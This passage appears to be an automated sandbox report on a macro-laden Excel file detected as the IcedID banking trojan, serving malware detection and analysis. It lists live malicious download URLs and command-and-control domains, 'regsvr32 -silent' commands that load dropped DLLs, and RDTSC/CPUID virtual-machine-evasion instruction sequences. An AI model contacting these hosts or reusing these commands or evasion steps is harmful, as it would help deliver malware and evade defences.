        Source: regsvr32.exe, 00000003.00000003.2098314338.0000000002B82000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2113666221.0000000003046000.00000004.00000001.sdmpString found in binary or memory: https://portal.aws.amazon.com/gp/aws/manageYourAccount?nc2=h_m_ma
        Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 49174
        Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 49172
        Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 49170
        Source: unknown, Network traffic detected: HTTP traffic on port 49172 -> 443
        Source: unknown, Network traffic detected: HTTP traffic on port 49170 -> 443
        Source: unknown, Network traffic detected: HTTP traffic on port 49174 -> 443

        E-Banking Fraud:

        Yara detected IcedID
        Source: Yara match, File source: dump.pcap, type: PCAP
        Source: Yara match, File source: 00000004.00000002.2111691413.00000000003E7000.00000004.00000020.sdmp, type: MEMORY
        Source: Yara match, File source: 00000003.00000002.2101851829.00000000001FD000.00000004.00000020.sdmp, type: MEMORY
        Source: Yara match, File source: 00000004.00000002.2111724951.0000000000407000.00000004.00000020.sdmp, type: MEMORY
        Source: Yara match, File source: 00000005.00000002.2117952085.00000000028A4000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara match, File source: 00000005.00000002.2116809079.0000000000467000.00000004.00000020.sdmp, type: MEMORY
        Source: Yara match, File source: Process Memory Space: regsvr32.exe PID: 2308, type: MEMORY
        Source: Yara match, File source: Process Memory Space: regsvr32.exe PID: 3060, type: MEMORY
        Source: Yara match, File source: Process Memory Space: regsvr32.exe PID: 1920, type: MEMORY

        System Summary:

        Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
        Source: Document image extraction number: 0, Screenshot OCR: Enable editing button from the yellow bar above Once you have enabled editing, please click Enabl
        Source: Document image extraction number: 0, Screenshot OCR: Enable Content button from the yellow bar above
        Source: Document image extraction number: 1, Screenshot OCR: Enable editing button from the yellow bar above Once you have enabled editing, please click Enabl
        Source: Document image extraction number: 1, Screenshot OCR: Enable Content button from the yellow bar above
        Office process drops PE file
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\lsdfik[1].fml
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, File created: C:\Users\user\XTOWN.dll
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\lsdfik[1].fml
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, File created: C:\Users\user\XRAY.dll
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, File created: C:\Users\user\XZIBIT.dll
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\lsdfik[1].fml
        Source: C:\Windows\System32\regsvr32.exe, Code function: 3_2_020D1678 NtQuerySystemInformation,3_2_020D1678
        Source: C:\Windows\System32\regsvr32.exe, Code function: 4_2_00131678 NtQuerySystemInformation,4_2_00131678
        Source: C:\Windows\System32\regsvr32.exe, Code function: 3_2_020D1810 3_2_020D1810
        Source: C:\Windows\System32\regsvr32.exe, Code function: 3_2_000007FEF8FB15D0 3_2_000007FEF8FB15D0
        Source: C:\Windows\System32\regsvr32.exe, Code function: 3_2_000007FEF8FB41BF 3_2_000007FEF8FB41BF
        Source: C:\Windows\System32\regsvr32.exe, Code function: 4_2_00131810 4_2_00131810
        Source: C:\Windows\System32\regsvr32.exe, Code function: 4_2_000007FEF8F915D0 4_2_000007FEF8F915D0
        Source: C:\Windows\System32\regsvr32.exe, Code function: 4_2_000007FEF8F941BF 4_2_000007FEF8F941BF
        Source: Joe Sandbox View, Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\lsdfik[1].fml 2B56EFDD9D771BCE51087101AC109C30B81E29E583C0178D33B90AD0128D9BA8
        Source: Joe Sandbox View, Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\lsdfik[1].fml 2B56EFDD9D771BCE51087101AC109C30B81E29E583C0178D33B90AD0128D9BA8
        Source: Joe Sandbox View, Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\lsdfik[1].fml 2B56EFDD9D771BCE51087101AC109C30B81E29E583C0178D33B90AD0128D9BA8
        Source: Joe Sandbox View, Dropped File: C:\Users\user\XRAY.dll 2B56EFDD9D771BCE51087101AC109C30B81E29E583C0178D33B90AD0128D9BA8
        Matched rule: MAL_IcedID_GZIP_LDR_202104 date = 2021-04-12, author = Thomas Barabosch, Telekom Security, description = 2021 initial Bokbot / Icedid loader for fake GZIP payloads, reference = https://www.telekom.com/en/blog/group/article/let-s-set-ice-on-fire-hunting-and-detecting-icedid-infections-627240
        Matched in:
        Source: 4.2.regsvr32.exe.110000.0.unpack, type: UNPACKEDPE
        Source: 3.2.regsvr32.exe.20d0000.4.unpack, type: UNPACKEDPE
        Source: 4.2.regsvr32.exe.130000.1.unpack, type: UNPACKEDPE
        Source: 3.2.regsvr32.exe.290000.0.unpack, type: UNPACKEDPE
        Source: 5.2.regsvr32.exe.110000.0.raw.unpack, type: UNPACKEDPE
        Source: 5.2.regsvr32.exe.110000.0.unpack, type: UNPACKEDPE
        Source: 4.2.regsvr32.exe.110000.0.raw.unpack, type: UNPACKEDPE
        Source: 5.2.regsvr32.exe.130000.1.unpack, type: UNPACKEDPE
        Source: 3.2.regsvr32.exe.290000.0.raw.unpack, type: UNPACKEDPE
        Source: 00000003.00000002.2101910318.0000000000290000.00000004.00000001.sdmp, type: MEMORY
        Source: 00000004.00000002.2109602309.0000000000110000.00000004.00000001.sdmp, type: MEMORY
        Source: 00000005.00000002.2116608760.0000000000110000.00000004.00000001.sdmp, type: MEMORY
        Source: regsvr32.exe, 00000003.00000002.2103466805.00000000031B0000.00000002.00000001.sdmp, Binary or memory string: .VBPud<_
        Source: classification engine, Classification label: mal100.troj.expl.evad.winXLSM@7/8@15/6
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, File created: C:\Users\user\Desktop\~$DeliveryConf535215.xlsm
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, File created: C:\Users\user\AppData\Local\Temp\CVRD307.tmp
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, File read: C:\Users\desktop.ini
        Source: C:\Windows\System32\regsvr32.exe, Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
        Source: C:\Windows\System32\regsvr32.exe, File read: C:\Windows\System32\drivers\etc\hosts
        Source: unknown, Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, Process created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\XRAY.dll
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, Process created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\XTOWN.dll
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, Process created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\XZIBIT.dll
        Source: Window Recorder, Window detected: More than 3 window changes detected
        Source: DeliveryConf535215.xlsm, Initial sample: OLE zip file path = xl/worksheets/_rels/sheet2.xml.rels
        Source: DeliveryConf535215.xlsm, Initial sample: OLE zip file path = xl/media/image1.png
        Source: DeliveryConf535215.xlsm, Initial sample: OLE zip file path = xl/printerSettings/printerSettings2.bin
        Source: DeliveryConf535215.xlsm, Initial sample: OLE zip file path = xl/calcChain.xml
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
        Source: XRAY.dll.0.dr, Static PE information: real checksum: 0x1baf8 should be: 0x19d85
        Source: lsdfik[1].fml.0.dr, Static PE information: real checksum: 0x1baf8 should be: 0x19d85

        Boot Survival:

        Drops PE files to the user root directory
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, File created: C:\Users\user\XTOWN.dll
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, File created: C:\Users\user\XRAY.dll
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, File created: C:\Users\user\XZIBIT.dll
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, Process information set: NOOPENFILEERRORBOX

        Malware Analysis System Evasion:

        Contains functionality to detect hardware virtualization (CPUID execution measurement)
        Source: C:\Windows\System32\regsvr32.exe, Code function: 3_2_020D1E50 3_2_020D1E50
        Source: C:\Windows\System32\regsvr32.exe, Code function: 4_2_00131E50 4_2_00131E50
        Tries to detect virtualization through RDTSC time measurements
        Source: C:\Windows\System32\regsvr32.exe, RDTSC instruction interceptor: First address: 00000000020D1E71 second address: 00000000020D1E96 instructions: 0x00000000 rdtsc 0x00000002 dec eax 0x00000003 shl edx, 20h 0x00000006 dec eax 0x00000007 or eax, edx 0x00000009 dec esp 0x0000000a mov eax, eax 0x0000000c xor ecx, ecx 0x0000000e mov eax, 00000001h 0x00000013 cpuid 0x00000015 mov dword ptr [esp+20h], eax 0x00000019 mov dword ptr [esp+24h], ebx 0x0000001d mov dword ptr [esp+28h], ecx 0x00000021 mov dword ptr [esp+2Ch], edx 0x00000025 rdtsc
        Source: C:\Windows\System32\regsvr32.exe, RDTSC instruction interceptor: First address: 00000000020D1EAB second address: 00000000020D1EB8 instructions: 0x00000000 rdtsc 0x00000002 dec eax 0x00000003 shl edx, 20h 0x00000006 nop 0x00000007 dec eax 0x00000008 or eax, edx 0x0000000a dec eax 0x0000000b mov ecx, eax 0x0000000d rdtsc
        Source: C:\Windows\System32\regsvr32.exe, RDTSC instruction interceptor: First address: 0000000000131E71 second address: 0000000000131E96 instructions: 0x00000000 rdtsc 0x00000002 dec eax 0x00000003 shl edx, 20h 0x00000006 dec eax 0x00000007 or eax, edx 0x00000009 dec esp 0x0000000a mov eax, eax 0x0000000c xor ecx, ecx 0x0000000e mov eax, 00000001h 0x00000013 cpuid 0x00000015 mov dword ptr [esp+20h], eax 0x00000019 mov dword ptr [esp+24h], ebx 0x0000001d mov dword ptr [esp+28h], ecx 0x00000021 mov dword ptr [esp+2Ch], edx 0x00000025 rdtsc
        Source: C:\Windows\System32\regsvr32.exe, RDTSC instruction interceptor: First address: 0000000000131EAB second address: 0000000000131EB8 instructions: 0x00000000 rdtsc 0x00000002 dec eax 0x00000003 shl edx, 20h 0x00000006 nop 0x00000007 dec eax 0x00000008 or eax, edx 0x0000000a dec eax 0x0000000b mov ecx, eax 0x0000000d rdtsc
        Source: C:\Windows\System32\regsvr32.exe, Code function: 3_2_020D2434 rdtsc 3_2_020D2434
        Source: C:\Windows\System32\regsvr32.exe, Code function: GetAdaptersInfo,GetAdaptersInfo,3_2_020D27BC
        Source: C:\Windows\System32\regsvr32.exe, Code function: GetAdaptersInfo,GetAdaptersInfo,4_2_001327BC
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\lsdfik[1].fml
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\lsdfik[1].fml
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\lsdfik[1].fml
        Source: regsvr32.exe, 00000005.00000002.2118001022.0000000002901000.00000004.00000001.sdmp, Binary or memory string: <a href="/rds/vmware/?hp=tile&amp;so-exp=below"> <i></i> <span>Amazon RDS on VMware</span> <cite>Automate on-premises database management</cite> </a>
        Source: regsvr32.exe, 00000004.00000002.2113666221.0000000003046000.00000004.00000001.sdmp, Binary or memory string: <a href="/vmware/?hp=tile&amp;so-exp=below"> <i></i> <span>VMware Cloud on AWS</span> <cite>Build a hybrid cloud without custom hardware</cite> </a>
        Source: regsvr32.exe, 00000004.00000002.2113666221.0000000003046000.00000004.00000001.sdmp, Binary or memory string: <img src="//d1.awsstatic.com/Compute/VMware-Cloud-on-AWS_Icon_64_Squid.b126bc9cff89e6c44c4f5b9775521edd6743c2b8.png" alt="VMware-Cloud-on-AWS_Icon_64_Squid" title="VMware-Cloud-on-AWS_Icon_64_Squid" class="cq-dd-image" />
        Source: regsvr32.exe, 00000004.00000003.2108352068.00000000030C4000.00000004.00000001.sdmp, Binary or memory string: Migrate and extend VMware environments to the AWS Cloud
        Source: regsvr32.exe, 00000004.00000002.2113666221.0000000003046000.00000004.00000001.sdmp, Binary or memory string: <a style="padding-left:20px; padding-bottom:0px; padding-right:45px;" href="/vmware/?hp=tile&amp;tile=hybridsol" target="_blank" rel="noopener">
        Source: regsvr32.exe, 00000004.00000002.2113666221.0000000003046000.00000004.00000001.sdmp, Binary or memory string: </figure> <h3 id="VMware_Cloud_on_AWS" class="lb-tiny-align-center lb-txt-none lb-h3 lb-title"> VMware Cloud on AWS</h3>
        Source: regsvr32.exe, 00000004.00000002.2113666221.0000000003046000.00000004.00000001.sdmp, Binary or memory string: <a style="padding-left:30px; padding-bottom:0px; padding-right:30px;" href="/vmware/?hp=tile&amp;tile=hybridsol" target="_blank" rel="noopener">
        Source: C:\Windows\System32\regsvr32.exe, Process information queried: ProcessInformation

        HIPS / PFW / Operating System Protection Evasion:

        System process connects to network (likely due to code injection or exploit)
        Source: C:\Windows\System32\regsvr32.exe, Network Connect: 104.21.37.209 80
        Source: C:\Windows\System32\regsvr32.exe, Domain query: astrocycle.download
        Source: C:\Windows\System32\regsvr32.exe, Domain query: aws.amazon.com
        Source: C:\Windows\System32\regsvr32.exe, Network Connect: 13.224.92.73 187
        Source: C:\Windows\System32\regsvr32.exe, Network Connect: 172.67.213.115 80
        Source: C:\Windows\System32\regsvr32.exe, Code function: 3_2_020D22DC LookupAccountNameW,3_2_020D22DC

        Stealing of Sensitive Information:

        Yara detected IcedID

        Remote Access Functionality:

        Yara detected IcedID

        Mitre Att&ck Matrix

        Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
        Valid Accounts | Exploitation for Client Execution 43 | Path Interception | Process Injection 11 | Masquerading 121 | OS Credential Dumping | Security Software Discovery 211 | Remote Services | Archive Collected Data 1 | Exfiltration Over Other Network Medium | Encrypted Channel 12 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
        Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Disable or Modify Tools 1 | LSASS Memory | Process Discovery 1 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Ingress Tool Transfer 14 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
        Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Process Injection 11 | Security Account Manager | Account Discovery 1 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol 3 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
        Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Regsvr32 1 | NTDS | System Owner/User Discovery 1 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol 124 | SIM Card Swap | | Carrier Billing Fraud
        Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Software Packing | LSA Secrets | Remote System Discovery 1 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
        Replication Through Removable Media | Launchd | Rc.common | Rc.common | Steganography | Cached Domain Credentials | System Network Configuration Discovery 1 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
        External Remote Services | Scheduled Task | Startup Items | Startup Items | Compile After Delivery | DCSync | File and Directory Discovery 1 | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
        Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Indicator Removal from Tools | Proc Filesystem | System Information Discovery 22 | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue

        Behavior Graph

        Behavior Graph ID: 444679, Sample: DeliveryConf535215.xlsm, Startdate: 06/07/2021, Architecture: WINDOWS, Score: 100

        Sample signatures:
        • Found malware configuration
        • Document exploit detected (drops PE files)
        • Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
        • 6 other signatures

        EXCEL.EXE 53 28 (graph node 6), started:
        • DNS/IP: uppercilio.fun, 104.21.55.83, 49169, 80, CLOUDFLARENETUS, United States
        • DNS/IP: voopeople.fun, 172.67.194.117, 49168, 80, CLOUDFLARENETUS, United States
        • DNS/IP: thousandsyears.download, 172.67.198.51, 49167, 80, CLOUDFLARENETUS, United States
        • Dropped: C:\Users\user\XZIBIT.dll, PE32+
        • Dropped: C:\Users\user\XTOWN.dll, PE32+
        • Dropped: C:\Users\user\XRAY.dll, PE32+
        • Dropped: 3 other malicious files
        • Signature: Document exploit detected (creates forbidden files)
        • Signature: Document exploit detected (UrlDownloadToFile)
        • Started: regsvr32.exe 4 (graph node 11), regsvr32.exe (graph node 15), regsvr32.exe (graph node 17)

        regsvr32.exe 4 (graph node 11):
        • DNS/IP: astrocycle.download, 172.67.213.115, 49171, 49173, 80, CLOUDFLARENETUS, United States
        • DNS/IP: dr49lng3n1n2s.cloudfront.net, 13.224.92.73, 443, 49170, 49172, AMAZON-02US, United States
        • DNS/IP: 2 other IPs or domains
        • Signature: System process connects to network (likely due to code injection or exploit)
        • Signature: Contains functionality to detect hardware virtualization (CPUID execution measurement)
        • Signature: Tries to detect virtualization through RDTSC time measurements

        regsvr32.exe (graph node 15):
        • DNS/IP: tp.8e49140c2-frontier.amazon.com
        • DNS/IP: aws.amazon.com

        regsvr32.exe (graph node 17):
        • DNS/IP: 104.21.37.209, 49175, 80, CLOUDFLARENETUS, United States
        • DNS/IP: 2 other IPs or domains

        Antivirus, Machine Learning and Genetic Malware Detection

        Initial Sample

        No Antivirus matches

        Dropped Files

        No Antivirus matches

        Unpacked PE Files

        No Antivirus matches

        Domains

        No Antivirus matches

        URLs

        | Source | Detection | Scanner | Label | Link |
        | http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0 | 0% | URL Reputation | safe | |
        | https://www.honeycode.aws/?&trk=el_a134p000003yC6YAAU&trkCampaign=pac-edm-2020-honeycode-hom | 0% | URL Reputation | safe | |
        | https://www.buzzsprout.com; | 0% | Avira URL Cloud | safe | |
        | http://astrocycle.download/ | 0% | Avira URL Cloud | safe | |
        | http://crl.sca1b.amazontrus | 0% | Avira URL Cloud | safe | |
        | http://ocsp.sca1b.amazontrust.com06 | 0% | URL Reputation | safe | |
        | http://ocsp.rootca1.amazontrust.com0: | 0% | Avira URL Cloud | safe | |
        | http://crl.rootg2.amazontrust.com/rootg2.crl0 | 0% | URL Reputation | safe | |
        | http://uppercilio.fun/div/44376,8555986111.jpg | 0% | Avira URL Cloud | safe | |
        | https://prod-us-west-2.csp-report.marketing.aws.dev/submitx-amz-id-1V14NYAS7A06VC7HKS2ERX-Content-Ty | 0% | Avira URL Cloud | safe | |
        | https://prod-us-west-2.csp-report.marketing.aws.dev/submit | 0% | Avira URL Cloud | safe | |
        | http://thousandsyears.download/div/44376,8555986111.jpg | 0% | Avira URL Cloud | safe | |
        | https://amazonwebservices.d2.sc.omtrdc.net | 0% | Avira URL Cloud | safe | |
        | https://calculator.wsstatic.com | 0% | Avira URL Cloud | safe | |
        | http://www.%s.comPA | 0% | URL Reputation | safe | |
        | https://112-tzm-766.mktoutil.com | 0% | Avira URL Cloud | safe | |
        | https://download.stormacq.com/aws/podcast/ | 0% | Avira URL Cloud | safe | |
        | http://crl.pkioverheid.nl/DomOvLatestCRL.crl0 | 0% | URL Reputation | safe | |
        | astrocycle.download | 0% | Avira URL Cloud | safe | |

        Domains and IPs

        Contacted Domains

        | Name | IP | Active | Malicious | Antivirus Detection | Reputation |
        | uppercilio.fun | 104.21.55.83 | true | false | | unknown |
        | thousandsyears.download | 172.67.198.51 | true | false | | unknown |
        | voopeople.fun | 172.67.194.117 | true | false | | unknown |
        | astrocycle.download | 172.67.213.115 | true | true | | unknown |
        | dr49lng3n1n2s.cloudfront.net | 13.224.92.73 | true | false | | high |
        | aws.amazon.com | unknown | unknown | false | | high |

        Contacted URLs

        | Name | Malicious | Antivirus Detection | Reputation |
        | http://astrocycle.download/ | true | Avira URL Cloud: safe | unknown |
        | http://uppercilio.fun/div/44376,8555986111.jpg | false | Avira URL Cloud: safe | unknown |
        | http://thousandsyears.download/div/44376,8555986111.jpg | false | Avira URL Cloud: safe | unknown |
        | astrocycle.download | true | Avira URL Cloud: safe | unknown |

        URLs from Memory and Binaries

                                                                                                                                        https://pages.awscloud.com/fico-case-study.html?hp=tile&amp;story=ficoregsvr32.exe, 00000003.00000002.2102922360.0000000002B92000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2113666221.0000000003046000.00000004.00000001.sdmpfalse
                                                                                                                                          high
                                                                                                                                          https://ssl-static.libsyn.comregsvr32.exe, 00000004.00000003.2106480345.000000000303C000.00000004.00000001.sdmpfalse
                                                                                                                                            high
                                                                                                                                            https://website.spot.ec2.aws.a2z.comregsvr32.exe, 00000004.00000003.2106480345.000000000303C000.00000004.00000001.sdmpfalse
                                                                                                                                              high
                                                                                                                                              https://112-tzm-766.mktoutil.comregsvr32.exe, 00000004.00000003.2106480345.000000000303C000.00000004.00000001.sdmpfalse
                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                              unknown
                                                                                                                                              https://static.doubleclick.netregsvr32.exe, 00000004.00000003.2106480345.000000000303C000.00000004.00000001.sdmpfalse
                                                                                                                                                high
                                                                                                                                                https://aws.amazon.com/th/?nc1=f_lsregsvr32.exe, 00000004.00000002.2113666221.0000000003046000.00000004.00000001.sdmpfalse
                                                                                                                                                  high
                                                                                                                                                  http://investor.msn.comregsvr32.exe, 00000003.00000002.2103466805.00000000031B0000.00000002.00000001.sdmpfalse
                                                                                                                                                    high
                                                                                                                                                    https://aws.amazon.com/tr/regsvr32.exe, 00000003.00000003.2098314338.0000000002B82000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2113666221.0000000003046000.00000004.00000001.sdmpfalse
                                                                                                                                                      high
                                                                                                                                                      https://a0.awsstatic.com/g11n-lib/2.0.76regsvr32.exe, 00000003.00000003.2098314338.0000000002B82000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2113666221.0000000003046000.00000004.00000001.sdmpfalse
                                                                                                                                                        high
                                                                                                                                                        https://s0.awsstatic.comregsvr32.exe, 00000004.00000003.2106480345.000000000303C000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2113610800.0000000003030000.00000004.00000001.sdmpfalse
                                                                                                                                                          high
                                                                                                                                                          https://a0.awsstatic.com/pricing-savings-plan/js/1.0.6regsvr32.exe, 00000003.00000003.2098314338.0000000002B82000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2113666221.0000000003046000.00000004.00000001.sdmpfalse
                                                                                                                                                            high
                                                                                                                                                            https://www.amazon.jobs/awsregsvr32.exe, 00000003.00000002.2102922360.0000000002B92000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2113666221.0000000003046000.00000004.00000001.sdmpfalse
                                                                                                                                                              high
                                                                                                                                                              https://a0.awsstatic.com/libra-css/images/site/touch-icon-iphone-114-smile.pngregsvr32.exe, 00000004.00000002.2113666221.0000000003046000.00000004.00000001.sdmpfalse
                                                                                                                                                                high
                                                                                                                                                                https://aws.amazon.com/Sregsvr32.exe, 00000004.00000003.2106693910.0000000000407000.00000004.00000001.sdmpfalse
                                                                                                                                                                  high
                                                                                                                                                                  https://googleads.g.doubleclick.netregsvr32.exe, 00000004.00000002.2113610800.0000000003030000.00000004.00000001.sdmpfalse
                                                                                                                                                                    high
                                                                                                                                                                    https://s3.amazonaws.com/aws-messaging-pricing-information/regsvr32.exe, 00000004.00000003.2106480345.000000000303C000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2113610800.0000000003030000.00000004.00000001.sdmpfalse
                                                                                                                                                                      high
                                                                                                                                                                      https://download.stormacq.com/aws/podcast/regsvr32.exe, 00000004.00000003.2106480345.000000000303C000.00000004.00000001.sdmpfalse
                                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                                      unknown
                                                                                                                                                                      https://a0.awsstatic.com/target/1.0.114/aws-target-mediator.jsregsvr32.exe, 00000003.00000003.2098314338.0000000002B82000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2113666221.0000000003046000.00000004.00000001.sdmpfalse
                                                                                                                                                                        high
                                                                                                                                                                        https://console.aws.amazon.com/support/home?nc2=h_ql_curegsvr32.exe, 00000003.00000003.2098314338.0000000002B82000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2113666221.0000000003046000.00000004.00000001.sdmpfalse
                                                                                                                                                                          high
                                                                                                                                                                          https://a0.awsstatic.com/libra-css/images/gi-map/AWS_Global-Infrastructure-Map.svgregsvr32.exe, 00000003.00000002.2102922360.0000000002B92000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2113666221.0000000003046000.00000004.00000001.sdmpfalse
                                                                                                                                                                            high
                                                                                                                                                                            https://d2908q01vomqb2.cloudfront.netregsvr32.exe, 00000004.00000002.2113610800.0000000003030000.00000004.00000001.sdmpfalse
                                                                                                                                                                              high
                                                                                                                                                                              http://crl.pkioverheid.nl/DomOvLatestCRL.crl0regsvr32.exe, 00000003.00000002.2101851829.00000000001FD000.00000004.00000020.sdmp, regsvr32.exe, 00000004.00000003.2106693910.0000000000407000.00000004.00000001.sdmpfalse
                                                                                                                                                                              • URL Reputation: safe
                                                                                                                                                                              • URL Reputation: safe
                                                                                                                                                                              • URL Reputation: safe
                                                                                                                                                                              unknown
                                                                                                                                                                              https://dgen8gghn3u86.cloudfront.netregsvr32.exe, 00000004.00000003.2106480345.000000000303C000.00000004.00000001.sdmpfalse
                                                                                                                                                                                high
                                                                                                                                                                                https://pages.awscloud.comregsvr32.exe, 00000004.00000003.2106480345.000000000303C000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2113610800.0000000003030000.00000004.00000001.sdmpfalse
                                                                                                                                                                                  high
                                                                                                                                                                                  https://aws.amazon.com/vi/?nc1=f_lsregsvr32.exe, 00000004.00000002.2113666221.0000000003046000.00000004.00000001.sdmpfalse
                                                                                                                                                                                    high
                                                                                                                                                                                    https://view-staging.us-east-1.prod.plc1-prod.pricing.aws.a2z.comregsvr32.exe, 00000004.00000003.2106480345.000000000303C000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2113610800.0000000003030000.00000004.00000001.sdmpfalse
                                                                                                                                                                                      high

Contacted IPs

Public

IP              Domain                        Country        ASN    ASN Name         Malicious
172.67.198.51   thousandsyears.download       United States  13335  CLOUDFLARENETUS  false
13.224.92.73    dr49lng3n1n2s.cloudfront.net  United States  16509  AMAZON-02US      false
104.21.55.83    uppercilio.fun                United States  13335  CLOUDFLARENETUS  false
104.21.37.209   unknown                       United States  13335  CLOUDFLARENETUS  true
172.67.213.115  astrocycle.download           United States  13335  CLOUDFLARENETUS  true
172.67.194.117  voopeople.fun                 United States  13335  CLOUDFLARENETUS  false

General Information

Joe Sandbox Version: 32.0.0 Black Diamond
Analysis ID: 444679
Start date: 06.07.2021
Start time: 15:06:27
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 7m 35s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: DeliveryConf535215.xlsm
Cookbook file name: defaultwindowsofficecookbook.jbs
Analysis system description: Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes analysed: 6
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.expl.evad.winXLSM@7/8@15/6
EGA Information: Failed
HDC Information:
• Successful, ratio: 65.4% (good quality ratio 51.5%)
• Quality average: 59.5%
• Quality standard deviation: 39.6%
HCA Information:
• Successful, ratio: 76%
• Number of executed functions: 24
• Number of non-executed functions: 3
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Found application associated with file extension: .xlsm
• Found Word or Excel or PowerPoint or XPS Viewer
• Attach to Office via COM
